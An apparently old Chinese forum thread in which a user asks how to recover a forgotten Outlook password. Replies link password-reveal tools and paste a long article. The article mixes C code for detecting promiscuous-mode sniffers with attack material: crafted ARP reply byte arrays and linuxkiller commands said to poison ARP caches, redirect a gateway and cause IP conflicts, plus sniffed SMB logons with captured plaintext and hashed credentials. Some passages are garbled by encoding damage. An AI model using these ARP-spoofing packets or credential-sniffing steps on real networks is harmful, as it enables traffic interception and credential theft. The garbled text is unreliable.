我的outlook的密码忘了,如何才能找回密码呢?---急用,重谢!!!(103分)

  • 主题发起人 主题发起人 quietosea
  • 开始时间 开始时间
Q

quietosea

Unregistered / Unconfirmed
GUEST, unregistred user!
有那位高手知道outlook的账户信息(邮件的smtp和pop的账户)加密原理,请指教一下,如何才能取出密码呢?愿出高分求教,分不够可再开贴加!
 
sniffer软件可以监测到邮箱密码,如果你油箱的密码丢了,可在 http://www.newhua.com/soft/7369.htm 下载破解程序,<br><br><br>------------------------------------------------<br>如何检测Sniffer<br><br>&nbsp; &nbsp; 技术细节 L0pht 公司已经说明了,如下:<br>Win9x/NT<br>  正常情况下,就是说不在混乱模式,网卡检测是不是广播地址<br>要比较看收到的目的以太网址是否等于ff.ff.ff.ff.ff.ff<br>是则认为是广播地址。<br>  在混乱模式时,网卡检测是不是广播地址只看收到包的目的以太<br>网址的第一个八位组值,是0xff则认为是广播地址。<br>利用这点细微差别就可以检测出Sniffer.<br>Linux<br>  以前就提出过,一些版本内核有这种问题:<br>  当混杂模式时,每个包都被传到了操作系统内核以处理。<br>在处理某些包,只看IP地址而不看以太网头中的源物理地址。<br>所以:<br>  使用一个不存在的目的MAC,正确的目的IP,受影响<br>的内核将会由于是混杂模式而处理它,并将之交给相应系统<br>堆栈处理。从而实现检测Sniffer<br>  总之,只要发一个以太网头中目的地址是ff.00.00.00.00.00<br>的ARP包(l0pht公司是ff.ff.ff.ff.ff.00)就可以检测出Linux和<br>Windows网卡处于混乱状态的计算机.<br>  以下是一个Linux下用于检测Linux下Sniffer的程序,很多地方都贴<br>过了,我只改了一句话,这样也可以检测出Windows机器。:)<br>/*<br>gcc -lbsd -O3 -o linuxanti linuxanti.c<br>*/<br>/*<br>Network Promiscuous Ethernet Detector.<br>Linux 2.0.x / 2.1.x, libc5 &amp; GlibC<br>-----------------------------------------<br>(c) 1998 savage@apostols.org<br>-----------------------------------------<br>Scan your subnet, and detect promiscuous<br>Windows &amp; linuxes. It really works, not a joke.<br>-----------------------------------------<br>$Id: neped.c,v 1.4 1998/07/20 22:31:52 savage Exp $<br>*/<br>#include &lt;stdio.h&gt;<br>#include &lt;fcntl.h&gt; &nbsp; &nbsp; &nbsp; &nbsp; /* for nonblocking */<br>#include &lt;sys/ioctl.h&gt;<br>#include &lt;sys/socket.h&gt; &nbsp; &nbsp;/* basic socket definitions */<br>#include &lt;net/if.h&gt; &nbsp; &nbsp; &nbsp; &nbsp;/* for ifreq */<br>#include &lt;arpa/inet.h&gt; &nbsp; &nbsp; /* inet(3) functions */<br>#define ETH_P_ARP 0x0806<br>#define MAX_PACK_LEN 2000<br>#define ETHER_HEADER_LEN 14<br>#define ARPREQUEST 1<br>#define ARPREPLY 2<br>#define perr(s) fprintf(stderr,s)<br>struct arp_struct<br>{<br>u_char dst_mac[6];<br>u_char src_mac[6];<br>u_short pkt_type;<br>u_short hw_type;<br>u_short pro_type;<br>u_char hw_len;<br>u_char pro_len;<br>u_short arp_op;<br>u_char sender_eth[6];<br>u_char sender_ip[4];<br>u_char target_eth[6];<br>u_char target_ip[4];<br>};<br>union<br>{<br>u_char full_packet[MAX_PACK_LEN];<br>struct arp_struct arp_pkt;<br>}<br>a;<br>#define full_packet a.full_packet<br>#define arp_pkt a.arp_pkt<br>char *<br>inetaddr ( u_int32_t ip )<br>{<br>struct in_addr in;<br>in.s_addr = ip;<br>return inet_ntoa(in);<br>}<br>char *<br>hwaddr (u_char * s)<br>{<br>static char buf[30];<br>sprintf (buf, "%02X:%02X:%02X:%02X:%02X:%02X", s[0], s[1], s[2], s[3],<br>s[4], s[5]);<br>return buf;<br>}<br>void<br>main (int argc, char **argv)<br>{<br>int rec;<br>int len, from_len, rsflags;<br>struct ifreq if_data;<br>struct sockaddr from;<br>u_int8_t myMAC[6];<br>u_int32_t myIP, myNETMASK, myBROADCAST, ip, dip, sip;<br>if (getuid () != 0)<br>{<br>perr ("You must be root to run this program!/n");<br>exit (0);<br>}<br>if (argc != 2)<br>{<br>fprintf(stderr,"Usage: %s eth0/n", argv[0]);<br>exit (0);<br>}<br>if ((rec = socket (AF_INET, SOCK_PACKET, htons (ETH_P_ARP))) &lt; 0)<br>{<br>perror("socket");<br>exit (0);<br>}<br>printf ("----------------------------------------------------------/n");<br>strcpy (if_data.ifr_name, argv[1]);<br>if (ioctl (rec, SIOCGIFHWADDR, &amp;if_data) &lt; 0) {<br>perr ("can't get HW addres of my interface!/n");<br>exit(1);<br>}<br>memcpy (myMAC, if_data.ifr_hwaddr.sa_data, 6);<br>printf ("&gt; My HW Addr: %s/n", hwaddr (myMAC));<br>if (ioctl (rec, SIOCGIFADDR, &amp;if_data) &lt; 0) {<br>perr ("can't get IP addres of my interface!/n");<br>exit(1);<br>}<br>memcpy ((void *) &amp;ip, (void *) &amp;if_data.ifr_addr.sa_data + 2, 4);<br>myIP = ntohl (ip);<br>printf ("&gt; My IP Addr: %s/n", inetaddr(ip));<br>if (ioctl (rec, SIOCGIFNETMASK, &amp;if_data) &lt; 0)<br>perr ("can't get NETMASK addres of my interface!/n");<br>memcpy ((void *) &amp;ip, (void *) &amp;if_data.ifr_netmask.sa_data + 2, 4);<br>myNETMASK = ntohl (ip);<br>printf ("&gt; My NETMASK: %s/n", inetaddr(ip));<br>if (ioctl (rec, SIOCGIFBRDADDR, &amp;if_data) &lt; 0)<br>perr ("can't get BROADCAST addres of my interface!/n");<br>memcpy ((void *) &amp;ip, (void *) &amp;if_data.ifr_broadaddr.sa_data + 2, 4);<br>myBROADCAST = ntohl (ip);<br>printf ("&gt; My BROADCAST: %s/n", inetaddr(ip));<br>if ((rsflags = fcntl (rec, F_GETFL)) == -1)<br>{<br>perror ("fcntl F_GETFL");<br>exit (1);<br>}<br>if (fcntl (rec, F_SETFL, rsflags | O_NONBLOCK) == -1)<br>{<br>perror ("fcntl F_SETFL");<br>exit (1);<br>}<br>printf ("----------------------------------------------------------/n");<br>printf ("&gt; Scanning ..../n");<br>for (dip = (myIP &amp; myNETMASK) + 1; dip &lt; myBROADCAST; dip++)<br>{<br>bzero(full_packet, MAX_PACK_LEN);<br>memcpy (arp_pkt.dst_mac, "/255/255/255/255/255/0", 6); /* ff:ff:ff:ff:ff:00<br>:) */<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* Only change this line! */<br>memcpy (arp_pkt.src_mac, myMAC, 6);<br>arp_pkt.pkt_type = htons( ETH_P_ARP );<br>arp_pkt.hw_type = htons( 0x0001 );<br>arp_pkt.hw_len = 6;<br>arp_pkt.pro_type = htons( 0x0800 );<br>arp_pkt.pro_len = 4;<br>arp_pkt.arp_op = htons (ARPREQUEST);<br>memcpy (arp_pkt.sender_eth, myMAC, 6);<br>ip = htonl (myIP);<br>memcpy (arp_pkt.sender_ip, &amp;ip, 4);<br>memcpy (arp_pkt.target_eth, "/0/0/0/0/0/0", 6);<br>ip = htonl (dip);<br>memcpy (arp_pkt.target_ip, &amp;ip, 4);<br>strcpy(from.sa_data, argv[1]);<br>from.sa_family = 1;<br>if( sendto (rec, full_packet, sizeof (struct arp_struct), 0, &amp;from,<br>sizeof(from)) &lt; 0)<br>perror ("sendto");<br>usleep (50);<br>len = recvfrom (rec, full_packet, MAX_PACK_LEN, 0, &amp;from, &amp;from_len);<br>if (len &lt;= ETHER_HEADER_LEN)<br>continue;<br>memcpy (&amp;ip, arp_pkt.target_ip, 4);<br>memcpy (&amp;sip, arp_pkt.sender_ip, 4);<br>if (ntohs (arp_pkt.arp_op) == ARPREPLY<br>&amp;&amp; ntohl (ip) == myIP<br>&amp;&amp; ( dip - ntohl(sip) &gt;= 0 )<br>&amp;&amp; ( dip - ntohl(sip) &lt;= 2 ) )<br>{<br>printf ("*&gt; Host %s, %s **** Promiscuous mode detected !!!/n",<br>inetaddr (sip),<br>hwaddr (arp_pkt.sender_eth));<br>}<br>}<br>printf ("&gt; End./n");<br>exit (0);<br>}<br><br><br><br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Sniffer Scaner<br><br>&nbsp;    &nbsp; Ace Studio , 1999. &nbsp;(AceStudio@hotmail.com)<br><br>&nbsp; &nbsp; 运行环境:Win95/98,无需Winsock<br><br>&nbsp; &nbsp; 本程序可以检测出本网络内正在运行Sniffer的计算机,或者说<br>网卡处于混乱状态。对方的操作系统可以是Win95/98/NT,Linux。<br><br>  Sniffer一般只能监听连到同一集线器上计算机(这主要看网络的<br>拓扑结构),但检测Sniffer可没这种限制,只要与对方通讯可以不过<br>路由。只要符合此条件其他网络中的Sniffer也可以查出。<br><br>  一般不必配置,程序会自动检测网络配置。一旦扫描发现有人窃<br>听,会提示对方的IP, MAC,并会记录到日志(Antilog.txt)中。<br><br>&nbsp; &nbsp; 注:有时候会误报。一般是某些网卡驱动本身的问题<br><br>&nbsp; &nbsp; 可以在以下位置下载<br>&nbsp; &nbsp; http://202.115.16.8/~skyfly/net/anti.zip<br>&nbsp; &nbsp; http://www2.neiep.edu.cn/ace/net/anti.zip<br><br><br><br>每台主机进入LAN时会向整个子网发送免费ARP通知报文,即该request包是<br>利用广播方式请求解析自己的IP地址,但源和目标IP已经就位了。<br>免费ARP(源IP和目标IP一致)请求意味着一个包就影响了整个子网,<br>如果一个错误的免费ARP请求出现,整个子网都被搅乱了。<br><br>即使主机不发送免费ARP报文,也会因为后续的request请求导致自己的IP-MAC<br>对进入LAN上所有主机的ARP Cache中,所以冲突与否与免费ARP包没有必然<br>联系。这个结论可以这样理解,一台Linux主机与pwin98争夺IP地址,Linux<br>主机将争夺成功,pwin98却一直在报告IP冲突,显然后面所有的IP冲突报告<br>都与免费ARP包没有关系了。<br><br>in_arpinput() 函数是4.XBSD-Lite2中的经典实现<br><br>&nbsp;1. 如果针对本机某个IP地址的请求到达,响应被送出。ARP入口<br>&nbsp; &nbsp; 被建立(如果相应入口不存在)。这个优化避免过多的ARP报文交换。<br>&nbsp;2. 如果ARP响应到达,相应的ARP入口建立完成,异己主机的MAC地址<br>&nbsp; &nbsp; 存储在sockaddr_dl结构中,队列中目标是该异己主机的报文现在<br>&nbsp; &nbsp; 可以发送了。<br>&nbsp;3. 假如异己主机发送了一个ARP请求包或者响应包,包中源IP地址等<br>&nbsp; &nbsp; 于自己的IP地址,那么两台之中必有一台错误配置了IP地址。Net/3<br>&nbsp; &nbsp; 侦测到这个错误并向管理员报告。<br>&nbsp;4. 主机接收到来自异己主机的ARP包,该异己主机的ARP入口已经存在,<br>&nbsp; &nbsp; 若包中异己主机的MAC地址已经改变,则相应的ARP入口中的MAC地址<br>&nbsp; &nbsp; 得到更新。<br>&nbsp;5. 主机可以配置成proxy ARP server。这意味着它代替目标主机响应<br>&nbsp; &nbsp; ARP请求。卷I的4.6节讨论了proxy ARP。用arp命令可以配置一台主<br>&nbsp; &nbsp; 机成为proxy ARP server。<br><br><br>从3可以看到什么时候进行了冲突监测,从4可以看到什么时候发生了ARP Cache<br>动态修改。<br><br>./linuxkiller -o 0x80000200 -c 0x0806 -b140002 -q eth0<br>捕捉一个ARP REPLY报文的完整二进制显示<br><br>byteArray [ 60 bytes ] ----&gt;<br>00000000 &nbsp;00 00 21 CE 28 A4 00 00-21 D1 22 F1 08 06 00 01 &nbsp; &nbsp;..!??.!??...<br>00000010 &nbsp;08 00 06 04 00 02 00 00-21 D1 22 F1 C0 A8 43 6F &nbsp; &nbsp;........!疡"括Co<br>00000020 &nbsp;00 00 21 CE 28 A4 C0 A8-43 74 20 20 20 20 20 20 &nbsp; &nbsp;..!韦(括Ct<br>00000030 &nbsp;20 20 20 20 20 20 20 20-20 20 20 20<br>[arp/rarp] &nbsp; &nbsp;hardware = 0001 protocol = 0800<br>&nbsp; &nbsp; &nbsp; &nbsp; hardAddLen = 06 proAddLen = 04<br>&nbsp; &nbsp; &nbsp; &nbsp; 00:00:21:D1:22:F1 -&gt; 00:00:21:CE:28:A4<br>&nbsp; &nbsp; &nbsp; &nbsp; 192.168.67.111 -&gt; 192.168.67.116 &nbsp; &nbsp;( ARP Reply )<br><br>00 00 21 CE 28 A4 00 00-00 00 00 00 08 06 00 01<br>08 00 06 04 00 02 00 00-00 00 00 00 C0 A8 43 6F<br>00 00 00 00 00 00 C0 A8-43 74<br>这种报文导致192.168.67.116的ARP CACHE中出现<br>192.168.67.111的MAC是00-00-00-00-00-00<br><br>52:54:AB:13:E1:C8 00 00-00 00 00 00 08 06 00 01<br>08 00 06 04 00 02 FF-FF-FF-EE-EE-EE C0 A8 43 6C<br>00 00 00 00 00 00 C0 A8-43 7C<br>这种报文导致192.168.67.124的ARP CACHE中出现<br>192.168.67.108的MAC是FF-FF-FF-EE-EE-EE<br><br>00 00 21 CE 28 A4 00 00-00 00 00 00 08 06 00 01<br>08 00 06 04 00 02 00 00-00 00 00 00 C0 A8 43 6F<br>00 00 00 00 00 00 00 00 00 00<br>这种不可以,因为192.168.67.116被写成了0.0.0.0<br><br>00 00 00 11 11 11 00 00-00 00 00 00 08 06 00 01<br>08 00 06 04 00 02 00-00-22-F1-21-D1 C0 A8-43 6A<br>这种导致192.168.67.106上报告ARP冲突,引发冲突的<br>MAC地址是00-00-22-F1-21-D1<br><br>00-00-21-D1-22-F1 00 00-00 00 00 00 08 06 00 01<br>08 00 06 04 00 02 00-00-22-F1-21-D1 C0 A8 43 65<br>这种导致192.168.67.101上报告ARP冲突<br><br>把上面的报文cat &gt; linuxkiller.byteArray,然后执行<br>./linuxkiller -k linuxkiller.byteArray -w 5<br>将导致发送了五个冲突包出去,会立刻看到效果。<br><br>如果是在Windows下,用NetXray发送也可以,不过NetXray有个毛病,<br>非要一定大小的报文才给发送,不能发送任意字节的报文,所以可能<br>你需要填充部分数据。ARP报文没有校验和的概念,所以也不用考虑<br>重新计算校验和的问题。<br><br>冲突没有什么意思,改写ARP Cache有点用,就是所以arp spoof的<br>一部分。免费ARP是移动IP所需要的。Linux解决办法是始终尊重<br>ATF_PERM标志, 就是说静态ARP入口不会在ARP性能优化规则下被接收<br>到的ARP包动态改变。Pwin98下用arp -s建立的静态ARP入口会被接收到<br>的ARP包动态改变,至少我测试过向全子网广播发送ARP请蟀??笸夹?改对应网关IP的MAC地址为错误的MAC,成功。因为ARP广播包不受<br>Lan Switch或者Smart Hub的影响,所以这是很无奈的一个结论。<br><br><br>struct mysmbhdr<br>{<br>&nbsp; &nbsp; u_char &nbsp; smb_c[4]; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /* 0xFF SMB,必须是这四个字节 */<br>&nbsp; &nbsp; u_char &nbsp; smb_command; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 目前只处理0x25 */<br>&nbsp; &nbsp; u_char &nbsp; smb_errorclass; &nbsp; &nbsp; &nbsp; &nbsp; /* 0 Success,当这四个字节全0时才继续处<br>理 *<br>&nbsp; &nbsp; u_char &nbsp; smb_reserved0; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 0x00 */<br>&nbsp; &nbsp; u_short &nbsp;smb_errorcode; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 00 00 Success */<br>&nbsp; &nbsp; u_char &nbsp; smb_flags1; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /* 0x80 Server Response,只处理这种情况<br>&nbsp;*/<br>&nbsp; &nbsp; u_short &nbsp;smb_flags2; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /* 主机字节顺序,不要理会 */<br>&nbsp; &nbsp; u_char &nbsp; smb_pad0[12]; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /* 全0的填充字节 */<br>&nbsp; &nbsp; u_short &nbsp;smb_treeid; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_callerpid; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_unauthuid; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_multiplexid; &nbsp; &nbsp; &nbsp; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_char &nbsp; smb_countofparam; &nbsp; &nbsp; &nbsp; /* 从smb_sentparambytes开始有多少个u_sh<br>ort# 不要理会 */<br>&nbsp; &nbsp; u_short &nbsp;smb_sentparambytes; &nbsp; &nbsp; /* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_totalsentdata; &nbsp; &nbsp; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_char &nbsp; smb_countofparam; &nbsp; &nbsp; &nbsp; /* 从smb_sentparambytes开始有多少个u_sh<br>ort?<br>&nbsp; &nbsp; u_short &nbsp;smb_sentparambytes; &nbsp; &nbsp; /* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_totalsentdata; &nbsp; &nbsp; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_reserved1; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 00 00 */<br>&nbsp; &nbsp; u_short &nbsp;smb_paramcount; &nbsp; &nbsp; &nbsp; &nbsp; /* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_paramoffset; &nbsp; &nbsp; &nbsp; &nbsp;/* 主机字节顺序,利用这个偏移去取共享资<br>源个<br>?*/<br>&nbsp; &nbsp; u_short &nbsp;smb_paramdisplacement; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_datacount; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* 主机字节顺序 */<br>&nbsp; &nbsp; u_short &nbsp;smb_dataoffset; &nbsp; &nbsp; &nbsp; &nbsp; /* 主机字节顺序,从这个偏移开始处理 */<br>&nbsp; &nbsp; u_short &nbsp;smb_datadisplacement; &nbsp; /* 主机字节顺序 */<br>};<br><br><br><br>口令明文传输的时?./linuxkiller -v 000021d40b92 -u 000000111111 -a 110000 -b 2575006500680B32<br>-f 2200<br>从192.168.67.106到192.168.67.107单向MAC过滤,分析SMB报文,对TCP数据区偏移25H<br>处进进?<br>字节过滤u.e.h.2<br>[ tcpsmb ] 192.168.67.106 [ 1190 ] --&gt; 192.168.67.107 [ 139 ]<br>byteArray [ 143 bytes ] ----&gt;<br>00000000 &nbsp;00 00 00 8B FF 53 4D 42-73 00 00 00 00 10 00 00 &nbsp; &nbsp;...婱Bs.......<br>00000010 &nbsp;00 00 00 00 00 00 00 00-00 00 00 00 00 00 CD 16 &nbsp; &nbsp;..............?<br><br>00000020 &nbsp;01 00 82 A6 0D 75 00 65-00 68 0B 32 00 00 00 8A &nbsp; &nbsp;..偊.u.e.h.2...<br><br>00000030 &nbsp;14 00 00 01 00 01 00 00-00 00 00 01 00 00 00 28 &nbsp; &nbsp;...............<br>(<br>00000040 &nbsp;00 00 00 53 43 5A 00 56-45 4E 55 53 54 45 43 48 &nbsp; &nbsp;...SCZ.VENUSTEC<br>H<br>00000050 &nbsp;00 57 69 6E 64 6F 77 73-20 34 2E 30 00 57 69 6E &nbsp; &nbsp;.Windows 4.0.Wi<br>n<br>00000060 &nbsp;64 6F 77 73 20 34 2E 30-00 04 FF 00 00 00 02 00 &nbsp; &nbsp;dows 4.0......<br>00000070 &nbsp;09 00 1B 00 XX XX XX XX-XX XX XX XX 00 5C 5C 56 &nbsp; &nbsp;....XXXXXXXX.//<br>V<br>00000080 &nbsp;45 4E 55 53 5C 53 43 5A-00 3F 3F 3F 3F 3F 00 &nbsp; &nbsp; &nbsp; ENUS/SCZ.?????.<br><br>口令加密传输<br>./linuxkiller -u 000000111111 -a 110000 -b 2575006500680B32 -f 200<br>[ tcpsmb ] 192.168.67.106 [ 1136 ] --&gt; 192.168.67.107 [ 139 ]<br>byteArray [ 158 bytes ] ----&gt;<br>00000000 &nbsp;00 00 00 9A FF 53 4D 42-73 00 00 00 00 10 00 00 &nbsp; &nbsp;...歁Bs.......<br>00000010 &nbsp;00 00 00 00 00 00 00 00-00 00 00 00 00 00 CD 16 &nbsp; &nbsp;..............?<br><br>00000020 &nbsp;01 00 01 4E 0D 75 00 65-00 68 0B 32 00 00 00 C7 &nbsp; &nbsp;...N.u.e.h.2...<br><br>00000030 &nbsp;1F 00 00 01 00 01 00 00-00 00 00 01 00 00 00 28 &nbsp; &nbsp;...............<br>(<br>00000040 &nbsp;00 00 00 53 43 5A 00 56-45 4E 55 53 54 45 43 48 &nbsp; &nbsp;...SCZ.VENUSTEC<br>H<br>00000050 &nbsp;00 57 69 6E 64 6F 77 73-20 34 2E 30 00 57 69 6E &nbsp; &nbsp;.Windows 4.0.Wi<br>n<br>00000060 &nbsp;64 6F 77 73 20 34 2E 30-00 04 FF 00 00 00 02 00 &nbsp; &nbsp;dows 4.0......<br>00000070 &nbsp;18 00 2A 00 E4 7F 2C 5D-88 04 86 D5 2A 96 73 3C &nbsp; &nbsp;..*.,]?喺*杝&lt;<br>00000080 &nbsp;4E 95 67 40 B8 38 F5 CB-6C 11 6D 1C 5C 5C 56 45 &nbsp; &nbsp;N昰@?跛l.m.//V<br>E<br>00000090 &nbsp;4E 55 53 5C 53 43 5A 00-3F 3F 3F 3F 3F 00 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;NUS/SCZ.?????.<br>53435a00 SCZ<br>56454e55535445434800 VENUSTECH<br>57696e646f777320342e3000 Windows 4.0<br>57696e646f777320342e3000 Windows 4.0<br>04ff000000020018002a00<br>e47f2c5d880486d52a96733c4e956740b838f5cb6c116d1c<br>5c5c56454e55535c53435a00 //VENUS/SCZ<br>3f3f3f3f3f00<br>用网络刺客保存下来的结果<br>SCZ/VENUSTECH:3:9f62be236e88c1be:000053435a0056454e5553544543480057696e646f7<br>7732<br>:000000000000000000000000000000000000000000000000<br><br><br><br>大凡兄弟们给程序,不少是去掉了头文件,<br>这个讨论下去没有意义,我也不说什么了,反正下面的<br>头文件会用的自己用去。注意,有些头文件是有顺序<br>的,我给的是可以用的,你如果增加或减少了什么,<br>不要动已经给出的顺序。linux下编译socket程序不<br>象solaris下有-lnsl -lsocket之类的开关,直接gcc就<br>可以了<br><br>#include &lt;ctype.h&gt; &nbsp; &nbsp; &nbsp; &nbsp; /* for isalpha */<br>#include &lt;stdio.h&gt;<br>#include &lt;stdlib.h&gt;<br>#include &lt;string.h&gt;<br>#include &lt;stdarg.h&gt; &nbsp; &nbsp; &nbsp; &nbsp;/* ANSI C header file */<br>#include &lt;syslog.h&gt; &nbsp; &nbsp; &nbsp; &nbsp;/* for syslog() */<br>#include &lt;errno.h&gt;<br>#include &lt;fcntl.h&gt; &nbsp; &nbsp; &nbsp; &nbsp; /* for nonblocking */<br>#include &lt;netdb.h&gt;<br>#include &lt;pwd.h&gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /* for getpass */<br>#include &lt;pthread.h&gt; &nbsp; &nbsp; &nbsp; /* for pthread_ */<br>#include &lt;signal.h&gt;<br>#include &lt;unistd.h&gt;<br>#include &lt;time.h&gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* timespec{} for pselect() */<br>#include &lt;sys/ioctl.h&gt;<br>#include &lt;sys/mman.h&gt; &nbsp; &nbsp; &nbsp;/* for mmap */<br>#include &lt;sys/poll.h&gt; &nbsp; &nbsp; &nbsp;/* for poll */<br>#include &lt;sys/socket.h&gt; &nbsp; &nbsp;/* basic socket definitions */<br>#include &lt;sys/stat.h&gt; &nbsp; &nbsp; &nbsp;/* for S_xxx file mode constants */<br>#include &lt;sys/time.h&gt; &nbsp; &nbsp; &nbsp;/* timeval{} for select() */<br>#include &lt;sys/types.h&gt; &nbsp; &nbsp; /* basic system data types */<br>#include &lt;sys/uio.h&gt; &nbsp; &nbsp; &nbsp; /* for iovec{} and readv/writev */<br>#include &lt;sys/un.h&gt; &nbsp; &nbsp; &nbsp; &nbsp;/* for Unix domain sockets */<br>#include &lt;sys/wait.h&gt;<br>#include &lt;sys/ipc.h&gt; &nbsp; &nbsp; &nbsp; /* for share memory */<br>#include &lt;sys/shm.h&gt;<br>#include &lt;sys/user.h&gt; &nbsp; &nbsp; &nbsp;/* for PAGE_SIZE */<br>#include &lt;net/if.h&gt; &nbsp; &nbsp; &nbsp; &nbsp;/* for ifreq */<br>#include &lt;net/ethernet.h&gt;<br>#include &lt;netinet/in.h&gt; &nbsp; &nbsp;/* sockaddr_in{} and other Internet defns */<br>#include &lt;netinet/ip.h&gt; &nbsp; &nbsp;/* for iphdr */<br>#include &lt;netinet/ip_icmp.h&gt;<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* for icmphdr */<br>#include &lt;netinet/igmp.h&gt; &nbsp;/* for igmp */<br>#include &lt;netinet/tcp.h&gt; &nbsp; /* for tcphdr */<br>#include &lt;netinet/udp.h&gt; &nbsp; /* for udphdr */<br>#include &lt;net/if_arp.h&gt; &nbsp; &nbsp;/* for arphdr */<br>#include &lt;arpa/inet.h&gt; &nbsp; &nbsp; /* inet(3) functions */<br>#include &lt;linux/if_ether.h&gt;<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* for ethhdr #define ETH_P_ALL 0x0003 */<br>#include &lt;linux/if_packet.h&gt;<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/* for struct sockaddr_ll */<br>#include &lt;linux/sysctl.h&gt;<br>#include &lt;linux/types.h&gt;<br>#include &lt;linux/unistd.h&gt; &nbsp;/* for sysctl */<br><br>首先非常感谢 skyfly 前面的介绍,解答了我一个迷惑很久的问题。<br>上次从清华搞回linux源代码编译运行前自以为是地修改了<br>下面这条语句中的mac地址,以前我以为只要是fake mac就可以<br>到达探测效果,没有想到还有其他窍道。现在用下面这条语句,就可<br>以同时针对windows和linux了<br>memcpy( arp_pkt.dst_mac, "/xff/0/0/0/0/0", 6 ); &nbsp;/* ff:00:00:00:00:00 */<br>估计源代码也是书写错误,不应该是/255/255/255/255/255/0的,<br>这种情况下只能监测出linux下的混杂模式网卡,而不能探测到NetXray的存在。<br>因为发送出去的是AD:AD:AD:AD:AD:0,这个fake mac依旧发现了SOCK_PACKET的存在,<br>但没有发现NetXray的存在。而ff:00:00:00:00:00发现了NetXray和IPMan的存在,<br>后者也就意味着所有使用Vpacket.vxd的都将被发现,包括网络刺客和S-Term。<br>不过 pred 也指出过,对网卡的promisc模式的监测是根据操作系统的不同反应来进行<br>的,监视的时候可以不装任何协议,这样就查不出promisc模式的网卡了。<br>虽然我没有在不装任何协议的情况下进行过监听,但 pred 指出的这个问题应该是存在<br><br>的。建议这样,把某台已经可以正常连入Lan的Pwin98的所有协议都卸载掉,重新安装<br>NetXray或者直接使用IPMan进行监听,就知道效果如何了。尤其是那种专门用来进行<br>局域网分析的硬件设备,估计这个程序是监测不到它们的存在。话说回来,有几个<br>会在自己本机不装网络协议的情况下进行监听呢,所以还是很有实际意义的。<br>只要启动了NetXray,网卡就进入了混杂模式,这个可以从它即使不进行监听也会报告网<br><br>络冲突包出现得到证实,同样Boy系列的工具、LinkViewPro等等都一样,只要启动了,<br><br>即使没有进行监听,也会设置网卡到混杂模式,退出后取消混杂模式。但是使用Vpacke<br>t.vx<br>的那些工具不是的,网络刺客,如果你不选择进行监听,网卡依旧在普通模式。不知道<br><br>使用packet.sys的NT下的监听工具又是怎么个样子,没测试过。在Linux下,如果你<br>是root用户,ifconfig eth0 promisc后,运行antisniff,发现也被监测到了,可以<br>逗别人玩玩嘛,让他来找你麻烦,然后开始诡辩。<br>虽然使用过L0pht的antisniff,一直奇怪为什么自己从清华弄来的源代码不行而它的<br>1.01可以,今天经skyfly一解释,明白啦,再次感谢 skyfly 。看来了解原理是一回事<br><br>情,深入了解后加以利用又是另外一回事情,早该用NetXray看看antisniff发了些什么<br>探<br>测包出来的,sigh<br>如果探测出来有混杂模式网卡存在,你该怎么办,办法是冷静,不要气汹汹地去找人,<br><br>没有意义,也不要无聊地进行所谓的自卫反击,目前最严重的问题是监听BBS,这个<br>可以通过使用ssh解决,华中站等Y2K危机过了,可以考虑使用sshd。<br>最后需要说明的是,这种监测是发送了大量报文到网络上的,网络分析软件会立刻发现<br>出<br>现异常高峰报文,如果你监测0-255范围,结果255的兄弟立刻断线,你就无法发现他刚<br>才<br>监听过你。而且,最好不要频繁监测,网络负载都被你拖下来了,还说什么其他的。矛<br>盾<br>的对立面呀,还是赶快使用IPV6以及SSL吧,要不就只好依赖于革命自觉性(鬼相信)。
 
楼上朋友:<br>&nbsp; &nbsp; 你的方法是针对邮箱,我要找的是outlook的密码,它存在什么地方呢?
 
随便找一个看***的软件都可以!<br>http://www.efile.com.cn/eFile/ty123/PassReveal.zip
 
请使用“OutLook密码恢复工具(注册版)”,如果没有的话,请给我来信RedLeaf_WGM@163.COM,我给你一份,不过不要不给我加分,否则,就没有第二次了!
 
呵呵<br>我知道<br>不过需要利用到COM接口<br>
 
